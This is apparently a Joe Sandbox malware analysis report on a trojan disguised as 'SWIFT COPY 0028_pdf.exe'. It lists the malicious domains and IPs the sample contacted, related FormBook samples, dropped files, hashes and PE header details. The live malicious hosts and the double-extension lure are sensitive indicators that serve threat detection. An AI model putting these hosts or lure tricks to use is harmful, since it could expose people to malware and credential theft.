                                                                          		high
                                                                          https://minne.com/?utm_source=lolipop&utm_medium=banner&utm_campaign=synergy&utm_content=404rasautou.exe, 00000004.00000002.4614264307.0000000005B08000.00000004.10000000.00040000.00000000.sdmp, nBMWUKLuWlMJko.exe, 00000006.00000002.4613915589.0000000003928000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://assets.lolipop.jp/img/bnr/bnr_lolipop_ad_001.gifrasautou.exe, 00000004.00000002.4614264307.0000000005B08000.00000004.10000000.00040000.00000000.sdmp, nBMWUKLuWlMJko.exe, 00000006.00000002.4613915589.0000000003928000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://www.ecosia.org/newtab/rasautou.exe, 00000004.00000002.4616647777.0000000007E7B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://ac.ecosia.org/autocomplete?q=rasautou.exe, 00000004.00000002.4616647777.0000000007E7B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://www.grandesofertas.fun/5rfk/?GR54yHZ8=sD5zUlt3wbrvSr53X/LgfhWrasautou.exe, 00000004.00000002.4614264307.0000000005976000.00000004.10000000.00040000.00000000.sdmp, nBMWUKLuWlMJko.exe, 00000006.00000002.4613915589.0000000003796000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              http://js.ad-stir.com/js/adstir.js?20130527rasautou.exe, 00000004.00000002.4614264307.0000000005B08000.00000004.10000000.00040000.00000000.sdmp, nBMWUKLuWlMJko.exe, 00000006.00000002.4613915589.0000000003928000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                		high
                                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=rasautou.exe, 00000004.00000002.4616647777.0000000007E7B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://static.minne.com/files/banner/minne_600x500rasautou.exe, 00000004.00000002.4614264307.0000000005B08000.00000004.10000000.00040000.00000000.sdmp, nBMWUKLuWlMJko.exe, 00000006.00000002.4613915589.0000000003928000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown

                                                                                  World Map of Contacted IPs

                                                                                  • No. of IPs < 25%
                                                                                  • 25% < No. of IPs < 50%
                                                                                  • 50% < No. of IPs < 75%
                                                                                  • 75% < No. of IPs

                                                                                  Public IPs

                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                  13.248.169.48
                                                                                  		www.optimismbank.xyzUnited States
                                                                                  		16509AMAZON-02UStrue
                                                                                  163.44.185.183
                                                                                  		www.sankan-fukushi.infoJapan7506INTERQGMOInternetIncJPtrue
                                                                                  103.224.182.242
                                                                                  		www.madhf.techAustralia
                                                                                  		133618TRELLIAN-AS-APTrellianPtyLimitedAUtrue
                                                                                  43.155.76.124
                                                                                  		b1-3-r111.kunlundns.topJapan4249LILLY-ASUStrue
                                                                                  172.67.162.39
                                                                                  		www.sitioseguro.blogUnited States
                                                                                  		13335CLOUDFLARENETUStrue
                                                                                  76.223.74.74
                                                                                  		ssl.goentri.comUnited States
                                                                                  		16509AMAZON-02UStrue
                                                                                  85.159.66.93
                                                                                  		natroredirect.natrocdn.comTurkey
                                                                                  		34619CIZGITRfalse
                                                                                  103.21.221.4
                                                                                  		tempatmudisini06.clickunknown
                                                                                  		9905LINKNET-ID-APLinknetASNIDtrue
                                                                                  172.67.162.12
                                                                                  		www.conansog.shopUnited States
                                                                                  		13335CLOUDFLARENETUStrue
                                                                                  188.114.96.3
                                                                                  		www.aziziyeescortg.xyzEuropean Union
                                                                                  		13335CLOUDFLARENETUStrue
                                                                                  104.21.4.93
                                                                                  		www.nonpressure.beautyUnited States
                                                                                  		13335CLOUDFLARENETUStrue
                                                                                  203.161.46.205
                                                                                  		www.housew.websiteMalaysia
                                                                                  		45899VNPT-AS-VNVNPTCorpVNtrue
                                                                                  66.29.137.10
                                                                                  		callyur.shopUnited States
                                                                                  		19538ADVANTAGECOMUStrue

                                                                                  General Information

                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                  Analysis ID:1559148
                                                                                  Start date and time:2024-11-20 08:30:25 +01:00
                                                                                  Joe Sandbox product:CloudBasic
                                                                                  Overall analysis duration:0h 10m 50s
                                                                                  Hypervisor based Inspection enabled:false
                                                                                  Report type:full
                                                                                  Cookbook file name:default.jbs
                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                  Number of analysed new started processes analysed:12
                                                                                  Number of new started drivers analysed:0
                                                                                  Number of existing processes analysed:0
                                                                                  Number of existing drivers analysed:0
                                                                                  Number of injected processes analysed:2
                                                                                  Technologies:
                                                                                  • HCA enabled
                                                                                  • EGA enabled
                                                                                  • AMSI enabled
                                                                                  Analysis Mode:default
                                                                                  Analysis stop reason:Timeout
                                                                                  Sample name:SWIFT COPY 0028_pdf.exe
                                                                                  Detection:MAL
                                                                                  Classification:mal100.troj.spyw.evad.winEXE@7/3@17/13
                                                                                  EGA Information:
                                                                                  • Successful, ratio: 75%
                                                                                  HCA Information:
                                                                                  • Successful, ratio: 97%
                                                                                  • Number of executed functions: 52
                                                                                  • Number of non-executed functions: 295
                                                                                  Cookbook Comments:
                                                                                  • Found application associated with file extension: .exe
                                                                                  • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                  Warnings

                                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                                                                                  • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                  • Execution Graph export aborted for target nBMWUKLuWlMJko.exe, PID 2940 because it is empty
                                                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                  • VT rate limit hit for: SWIFT COPY 0028_pdf.exe

                                                                                  Simulations

                                                                                  Behavior and APIs

                                                                                  TimeTypeDescription
                                                                                  02:32:11API Interceptor12181616x Sleep call for process: rasautou.exe modified

                                                                                  Joe Sandbox View / Context

                                                                                  IPs

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  13.248.169.48New Order - RCII900718_Contract Drafting.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.avalanchefi.xyz/ctta/
                                                                                  need quotations.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.egldfi.xyz/3e55/
                                                                                  Quotation request -30112024_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.tals.xyz/010v/
                                                                                  Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.wajf.net/dkz5/
                                                                                  rG5EzfUhUp.exeGet hashmaliciousSakula RATBrowse
                                                                                  • www.polarroute.com/newimage.asp?imageid=zcddwc1730788541&type=0&resid=5322796
                                                                                  dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.extrem.tech/ikn1/
                                                                                  Hire P.O.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.sonoscan.org/ew98/
                                                                                  RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.hopeisa.live/v0jl/
                                                                                  DHL SHIPPING CONFIRMATION-SAMPLES DELIVERY ADDRESS.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.layerzero.cfd/8f5m/
                                                                                  rGO880-PDF.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.reviewpro.shop/aclh/
                                                                                  163.44.185.183Item-RQF-9456786.exeGet hashmaliciousUnknownBrowse
                                                                                  • www.sankan-fukushi.info/p9qy/
                                                                                  order I 018629.xlsxGet hashmaliciousFormBookBrowse
                                                                                  • www.hihoha-menu.com/g24i/?Ij=C5lZ/tNmDIazGhz+mgSCdtEua581lzsfl6vwo2v3mqTQwnv5rjnUBpQzMVK0NvbkQlVLQw==&0f=e0DHTPtxAZK
                                                                                  103.224.182.242PROFORMA INVOICE.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.klohk.tech/3m3e/
                                                                                  Item-RQF-9456786.exeGet hashmaliciousUnknownBrowse
                                                                                  • www.madhf.tech/p31e/
                                                                                  http://perpetualsnob.comGet hashmaliciousUnknownBrowse
                                                                                  • perpetualsnob.com/?fp=a3db7cd464228025d120ca597c81b5f2
                                                                                  Shipping documents..exeGet hashmaliciousFormBookBrowse
                                                                                  • www.klohk.tech/3m3e/
                                                                                  SALARY OF OCT 2024.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.klohk.tech/3m3e/
                                                                                  Doc 784-01965670.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.givingaway123.net/1juc/
                                                                                  BL.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.givingaway123.net/1juc/
                                                                                  BILL OF LADDING.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.givingaway123.net/1juc/
                                                                                  jpdy1E8K4A.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.nobartv6.website/pp43/
                                                                                  CITA#U00c7#U00c3O.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.nobartv6.website/pp43/

                                                                                  Domains

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  b1-3-r111.kunlundns.topPO-DC13112024_pdf.vbsGet hashmaliciousUnknownBrowse
                                                                                  • 43.155.76.124
                                                                                  3NvALxFlHV.exeGet hashmaliciousFormBookBrowse
                                                                                  • 43.155.76.124
                                                                                  COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exeGet hashmaliciousFormBookBrowse
                                                                                  • 43.155.76.124
                                                                                  QUOTE2342534.exeGet hashmaliciousFormBookBrowse
                                                                                  • 129.226.56.200
                                                                                  COMMERCAIL INVOICE AND DHL AWB TRACKING DETAIL.exeGet hashmaliciousFormBookBrowse
                                                                                  • 129.226.56.200
                                                                                  Re property pdf.exeGet hashmaliciousFormBookBrowse
                                                                                  • 129.226.56.200
                                                                                  natroredirect.natrocdn.comneed quotations.exeGet hashmaliciousFormBookBrowse
                                                                                  • 85.159.66.93
                                                                                  Certificate 11-18720.exeGet hashmaliciousFormBookBrowse
                                                                                  • 85.159.66.93
                                                                                  RvJVMsNLJI.exeGet hashmaliciousFormBookBrowse
                                                                                  • 85.159.66.93
                                                                                  Certificate 64411-18.exeGet hashmaliciousFormBookBrowse
                                                                                  • 85.159.66.93
                                                                                  Certificate 11-17.exeGet hashmaliciousFormBookBrowse
                                                                                  • 85.159.66.93
                                                                                  Certificate 11-142024.exeGet hashmaliciousFormBookBrowse
                                                                                  • 85.159.66.93
                                                                                  Hire P.O.exeGet hashmaliciousFormBookBrowse
                                                                                  • 85.159.66.93
                                                                                  rDocument11-142024.exeGet hashmaliciousFormBookBrowse
                                                                                  • 85.159.66.93
                                                                                  DHL SHIPPING CONFIRMATION-SAMPLES DELIVERY ADDRESS.exeGet hashmaliciousFormBookBrowse
                                                                                  • 85.159.66.93
                                                                                  rGO880-PDF.exeGet hashmaliciousFormBookBrowse
                                                                                  • 85.159.66.93
                                                                                  www.conansog.shopFOTO#U011eRAFLAR.exeGet hashmaliciousFormBookBrowse
                                                                                  • 104.21.41.74
                                                                                  www.madhf.techItem-RQF-9456786.exeGet hashmaliciousUnknownBrowse
                                                                                  • 103.224.182.242
                                                                                  ssl.goentri.comItem-RQF-9456786.exeGet hashmaliciousUnknownBrowse
                                                                                  • 76.223.74.74

                                                                                  ASNs

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  TRELLIAN-AS-APTrellianPtyLimitedAUPROFORMA INVOICE.exeGet hashmaliciousFormBookBrowse
                                                                                  • 103.224.182.242
                                                                                  Item-RQF-9456786.exeGet hashmaliciousUnknownBrowse
                                                                                  • 103.224.182.242
                                                                                  8dPlV2lT8o.exeGet hashmaliciousSimda StealerBrowse
                                                                                  • 103.224.182.252
                                                                                  7ObLFE2iMK.exeGet hashmaliciousSimda StealerBrowse
                                                                                  • 103.224.182.252
                                                                                  UMwpXhA46R.exeGet hashmaliciousSimda StealerBrowse
                                                                                  • 103.224.182.252
                                                                                  1fWgBXPgiT.exeGet hashmaliciousSimda StealerBrowse
                                                                                  • 103.224.182.252
                                                                                  arxtPs1STE.exeGet hashmaliciousSimda StealerBrowse
                                                                                  • 103.224.182.252
                                                                                  Z8eHwAvqAh.exeGet hashmaliciousSimda StealerBrowse
                                                                                  • 103.224.182.252
                                                                                  WlCVLbzNph.exeGet hashmaliciousSimda StealerBrowse
                                                                                  • 103.224.182.252
                                                                                  Bpfz752pYZ.exeGet hashmaliciousSimda StealerBrowse
                                                                                  • 103.224.182.252
                                                                                  AMAZON-02USfile.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                  • 18.245.60.53
                                                                                  New Order - RCII900718_Contract Drafting.exeGet hashmaliciousFormBookBrowse
                                                                                  • 13.248.169.48
                                                                                  x86-20241120-0553.elfGet hashmaliciousUnknownBrowse
                                                                                  • 34.254.182.186
                                                                                  arm7.nn-20241120-0508.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                  • 3.131.202.239
                                                                                  meow.arm7.elfGet hashmaliciousUnknownBrowse
                                                                                  • 44.252.140.153
                                                                                  x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                  • 18.202.159.69
                                                                                  https://www.google.co.ao/url?Obdy=ObM8wNGVUva21gnTm3qS&cgsr=7knoOQwChvIkzgfn0TSm&sa=t&wofc=nQYL5DF797O1da77PTBQ&url=amp%2Fprimer-distrito-amvt.org%2F.r%2FiO8EME-SUREDANNaW50ZXJtb2RhbC5qYXhAc2VhYm9hcmRtYXJpbmUuY29tGet hashmaliciousUnknownBrowse
                                                                                  • 54.154.143.167
                                                                                  mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                  • 3.191.65.152
                                                                                  need quotations.exeGet hashmaliciousFormBookBrowse
                                                                                  • 13.248.169.48
                                                                                  https://atpscan.global.hornetsecurity.com/?d=zgarMAzqF8gJdiyz7BRUZX8-Kt1RoHrhrMmKtaU9kW8&f=VhLn9tqiibnSyqWDnEopjApZtye8WgAc5bwx7BMFWiKwqjA1EcPjZyfvoQy11klP&i=&k=QQhP&m=0jL9ajZ_jxYnMJb2yb4luNRYQCXy24RTS6RPwUyZoAcuBVX0kzGA69aOJSo0d2htwIsi238bOVH3h3HqrhJGfzTuFk7GTjJWYsgIrocXphf5x2p4nZ7S2EABjAck31fG&n=TU5FjsulXTMv8aeSlx257utLr9bUpfdm0dDB4GNEHfOuhOvtIOr62mZHw3PXGZeG&r=qntyoaxGftDLRu_wopiK2t_EdeZaeg9mP15ZZI-qDen_3s7cQ10pAlhKQQnYAIUX&s=c4a8f5ec353e41b8b414bdcf47b33dd5d6b52b0394e0e4a09cc54527f49761c3&u=https%3A%2F%2Fthe1oomisagency.com%2Fthyu%2FGet hashmaliciousUnknownBrowse
                                                                                  • 108.138.7.92
                                                                                  INTERQGMOInternetIncJPexe009.exeGet hashmaliciousEmotetBrowse
                                                                                  • 157.7.164.178
                                                                                  https://us-west-2.protection.sophos.com/?d=vercel.app&u=aHR0cHM6Ly93ZWJtYWlsLWF1dGgtc2VjLnZlcmNlbC5hcHA=&i=NWVjYjQ2MzZmNTgwNWIwZWJlZWZkM2Fl&t=UXZ3YkZpNSszWkdZNlBPdUNtNGVRQTM2ZzV1SmdscHZTN2E0TDhEQUVMYz0=&h=41cf60c27bc24f608fa5f6f60edfa437&s=AVNPUEhUT0NFTkNSWVBUSVYWbs5htFrsKfDZKi2vxyeN8JAV7eyBc8AqkmOaHaHVi8YGx5zRAzUm2TNYTJQ1rCs#Ymtqb29AaGRlbC5jby5rcg==Get hashmaliciousUnknownBrowse
                                                                                  • 150.95.219.20
                                                                                  Item-RQF-9456786.exeGet hashmaliciousUnknownBrowse
                                                                                  • 163.44.185.183
                                                                                  TT copy.exeGet hashmaliciousFormBookBrowse
                                                                                  • 150.95.254.16
                                                                                  botnet.m68k.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                  • 150.95.219.222
                                                                                  spc.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                  • 157.7.100.20
                                                                                  RO2Y11yOJ7.exeGet hashmaliciousFormBookBrowse
                                                                                  • 150.95.254.16
                                                                                  DHL_doc.exeGet hashmaliciousFormBookBrowse
                                                                                  • 163.44.176.12
                                                                                  r6lOHDg9N9.exeGet hashmaliciousFormBookBrowse
                                                                                  • 133.130.35.90
                                                                                  SECRFQ2024-0627 - ON HAND PROJECT - NEOM PROJECTS - SAUDI ELAF Co..exeGet hashmaliciousFormBookBrowse
                                                                                  • 150.95.254.16

                                                                                  JA3 Fingerprints

                                                                                  No context

                                                                                  Dropped Files

                                                                                  No context

                                                                                  Created / dropped Files

                                                                                  C:\Users\user\AppData\Local\Temp\3q3Zl7JL

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\rasautou.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1239949490932863
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                  Malicious:false
                                                                                  Reputation:high, very likely benign file
                                                                                  Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\Dunlop

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):290304
                                                                                  Entropy (8bit):7.9949146605094334
                                                                                  Encrypted:true
                                                                                  SSDEEP:6144:ZA7Db8gAPqzuZKz+2Ezm07IQoG5dBpDd0y8RhaD+g:xPqzQK/Ezm07Iy5dzDuyAhpg
                                                                                  MD5:5A5958BCA86E6545C97B0BF8A3846103
                                                                                  SHA1:20E4B02D639609C60F5C3E62C149FD46C51D2856
                                                                                  SHA-256:A14D0B58AE2CC9D7C8094A5FBE111D9B99299A591FCEBBBC4C63EDAA01B2080C
                                                                                  SHA-512:8FEB32EE7EA5E5C56C8E11BD4B03AAFF848A2FA3738F81B8FB617FCAD0659127802B04EFB8AC924540039543CAD9B4A8A73441BB66233D9B4A60E34E83050838
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:...9FQO8<6G2.OY.OTZ6YLYv4D0QH19EQO886G24WOYZOTZ6YLY64D0QH19.QO86).<4.F.{.U..x.1_Gd@#'VK$<o[YX)]@w-<z=!4.0"yr{..<'U\k\B2.6G24WOY#N]..9+..T#.l(V._....V ....f/3.,...T#..!RQx1(.86G24WOY..TZzXMY..ifQH19EQO8.6E3?VDYZ.PZ6YLY64D0.[19EAO88FC24W.YZ_TZ6[LY04D0QH19CQO886G24'KYZMTZ6YLY44..QH!9EAO886W24GOYZOTZ&YLY64D0QH19EQO886G24WOYZOTZ6YLY64D0QH19EQO886G24WOYZOTZ6YLY64D0QH19EQO886G24WOYZOTZ6YLY64D0QH19EQO886G24WOYZOTZ6YLY64D0QH19EQO886G2.#*!.OTZ..HY6$D0Q.59EAO886G24WOYZOTZ.YL964D0QH19EQO886G24WOYZOTZ6YLY64D0QH19EQO886G24WOYZOTZ6YLY64D0QH19EQO886G24WOYZOTZ6YLY64D0QH19EQO886G24WOYZOTZ6YLY64D0QH19EQO886G24WOYZOTZ6YLY64D0QH19EQO886G24WOYZOTZ6YLY64D0QH19EQO886G24WOYZOTZ6YLY64D0QH19EQO886G24WOYZOTZ6YLY64D0QH19EQO886G24WOYZOTZ6YLY64D0QH19EQO886G24WOYZOTZ6YLY64D0QH19EQO886G24WOYZOTZ6YLY64D0QH19EQO886G24WOYZOTZ6YLY64D0QH19EQO886G24WOYZOTZ6YLY64D0QH19EQO886G24WOYZOTZ6YLY64D0QH19EQO886G24WOYZOTZ6YLY64D0QH19EQO886G24WOYZOTZ6YLY64D0QH19EQO886G24WOYZOTZ6YLY64D0QH19EQO886G24WOYZOTZ6YLY64D0QH19EQO886G24WOYZOTZ

                                                                                  C:\Users\user\AppData\Local\Temp\aut7C9.tmp

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):290304
                                                                                  Entropy (8bit):7.9949146605094334
                                                                                  Encrypted:true
                                                                                  SSDEEP:6144:ZA7Db8gAPqzuZKz+2Ezm07IQoG5dBpDd0y8RhaD+g:xPqzQK/Ezm07Iy5dzDuyAhpg
                                                                                  MD5:5A5958BCA86E6545C97B0BF8A3846103
                                                                                  SHA1:20E4B02D639609C60F5C3E62C149FD46C51D2856
                                                                                  SHA-256:A14D0B58AE2CC9D7C8094A5FBE111D9B99299A591FCEBBBC4C63EDAA01B2080C
                                                                                  SHA-512:8FEB32EE7EA5E5C56C8E11BD4B03AAFF848A2FA3738F81B8FB617FCAD0659127802B04EFB8AC924540039543CAD9B4A8A73441BB66233D9B4A60E34E83050838
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:...9FQO8<6G2.OY.OTZ6YLYv4D0QH19EQO886G24WOYZOTZ6YLY64D0QH19.QO86).<4.F.{.U..x.1_Gd@#'VK$<o[YX)]@w-<z=!4.0"yr{..<'U\k\B2.6G24WOY#N]..9+..T#.l(V._....V ....f/3.,...T#..!RQx1(.86G24WOY..TZzXMY..ifQH19EQO8.6E3?VDYZ.PZ6YLY64D0.[19EAO88FC24W.YZ_TZ6[LY04D0QH19CQO886G24'KYZMTZ6YLY44..QH!9EAO886W24GOYZOTZ&YLY64D0QH19EQO886G24WOYZOTZ6YLY64D0QH19EQO886G24WOYZOTZ6YLY64D0QH19EQO886G24WOYZOTZ6YLY64D0QH19EQO886G24WOYZOTZ6YLY64D0QH19EQO886G2.#*!.OTZ..HY6$D0Q.59EAO886G24WOYZOTZ.YL964D0QH19EQO886G24WOYZOTZ6YLY64D0QH19EQO886G24WOYZOTZ6YLY64D0QH19EQO886G24WOYZOTZ6YLY64D0QH19EQO886G24WOYZOTZ6YLY64D0QH19EQO886G24WOYZOTZ6YLY64D0QH19EQO886G24WOYZOTZ6YLY64D0QH19EQO886G24WOYZOTZ6YLY64D0QH19EQO886G24WOYZOTZ6YLY64D0QH19EQO886G24WOYZOTZ6YLY64D0QH19EQO886G24WOYZOTZ6YLY64D0QH19EQO886G24WOYZOTZ6YLY64D0QH19EQO886G24WOYZOTZ6YLY64D0QH19EQO886G24WOYZOTZ6YLY64D0QH19EQO886G24WOYZOTZ6YLY64D0QH19EQO886G24WOYZOTZ6YLY64D0QH19EQO886G24WOYZOTZ6YLY64D0QH19EQO886G24WOYZOTZ6YLY64D0QH19EQO886G24WOYZOTZ6YLY64D0QH19EQO886G24WOYZOTZ

                                                                                  Static File Info

                                                                                  General

                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Entropy (8bit):7.150498811768912
                                                                                  TrID:
                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                  File name:SWIFT COPY 0028_pdf.exe
                                                                                  File size:1'217'536 bytes
                                                                                  MD5:aa99009ff8c996ccefd78eb8a4ce1d7e
                                                                                  SHA1:4061428787fa914d12ba52bc80af6c1725a2482d
                                                                                  SHA256:4c16a10a2942e6a9383fc241bf4232a087333c383c5a269381300e9036c01178
                                                                                  SHA512:cf966787c31425719d44e11b9d14c62174ed3b47f2022115038280cae23eb3d0e0b5403021cecfc474aff7a22172acd5852ae21f08487a6bd4e95e6c57dd695d
                                                                                  SSDEEP:24576:ktb20pkaCqT5TBWgNQ7aZVYUI1o9J0+lKipmS6A:NVg5tQ7aZVE1o4CKW5
                                                                                  TLSH:3D45D01363DEC365C3B25273BA657701BEBB782506A1F96B2FD4093DF820122525EA73
                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........

                                                                                  File Icon

                                                                                  Icon Hash:aaf3e3e3938382a0

                                                                                  Static PE Info

                                                                                  General

                                                                                  Entrypoint:0x425f74
                                                                                  Entrypoint Section:.text
                                                                                  Digitally signed:false
                                                                                  Imagebase:0x400000
                                                                                  Subsystem:windows gui
                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                  Time Stamp:0x673D4752 [Wed Nov 20 02:20:02 2024 UTC]
                                                                                  TLS Callbacks:
                                                                                  CLR (.Net) Version:
                                                                                  OS Version Major:5
                                                                                  OS Version Minor:1
                                                                                  File Version Major:5
                                                                                  File Version Minor:1
                                                                                  Subsystem Version Major:5
                                                                                  Subsystem Version Minor:1
                                                                                  Import Hash:3d95adbf13bbe79dc24dccb401c12091

                                                                                  Entrypoint Preview

                                                                                  Instruction
                                                                                  call 00007FBD294E339Fh
                                                                                  jmp 00007FBD294D63B4h
                                                                                  int3
                                                                                  int3
                                                                                  push edi
                                                                                  push esi
                                                                                  mov esi, dword ptr [esp+10h]
                                                                                  mov ecx, dword ptr [esp+14h]
                                                                                  mov edi, dword ptr [esp+0Ch]
                                                                                  mov eax, ecx
                                                                                  mov edx, ecx
                                                                                  add eax, esi
                                                                                  cmp edi, esi
                                                                                  jbe 00007FBD294D653Ah
                                                                                  cmp edi, eax
                                                                                  jc 00007FBD294D689Eh
                                                                                  bt dword ptr [004C0158h], 01h
                                                                                  jnc 00007FBD294D6539h
                                                                                  rep movsb
                                                                                  jmp 00007FBD294D684Ch
                                                                                  cmp ecx, 00000080h
                                                                                  jc 00007FBD294D6704h
                                                                                  mov eax, edi
                                                                                  xor eax, esi
                                                                                  test eax, 0000000Fh
                                                                                  jne 00007FBD294D6540h
                                                                                  bt dword ptr [004BA370h], 01h
                                                                                  jc 00007FBD294D6A10h
                                                                                  bt dword ptr [004C0158h], 00000000h
                                                                                  jnc 00007FBD294D66DDh
                                                                                  test edi, 00000003h
                                                                                  jne 00007FBD294D66EEh
                                                                                  test esi, 00000003h
                                                                                  jne 00007FBD294D66CDh
                                                                                  bt edi, 02h
                                                                                  jnc 00007FBD294D653Fh
                                                                                  mov eax, dword ptr [esi]
                                                                                  sub ecx, 04h
                                                                                  lea esi, dword ptr [esi+04h]
                                                                                  mov dword ptr [edi], eax
                                                                                  lea edi, dword ptr [edi+04h]
                                                                                  bt edi, 03h
                                                                                  jnc 00007FBD294D6543h
                                                                                  movq xmm1, qword ptr [esi]
                                                                                  sub ecx, 08h
                                                                                  lea esi, dword ptr [esi+08h]
                                                                                  movq qword ptr [edi], xmm1
                                                                                  lea edi, dword ptr [edi+08h]
                                                                                  test esi, 00000007h
                                                                                  je 00007FBD294D6595h
                                                                                  bt esi, 03h
                                                                                  jnc 00007FBD294D65E8h
                                                                                  movdqa xmm1, dqword ptr [esi+00h]

                                                                                  Rich Headers

                                                                                  Programming Language:
                                                                                  • [ C ] VS2008 SP1 build 30729
                                                                                  • [IMP] VS2008 SP1 build 30729
                                                                                  • [ASM] VS2012 UPD4 build 61030
                                                                                  • [RES] VS2012 UPD4 build 61030
                                                                                  • [LNK] VS2012 UPD4 build 61030

                                                                                  Data Directories

                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xb70040x17c.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xc40000x60358.rsrc
                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x1250000x6c4c.reloc
                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x8d8d00x1c.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
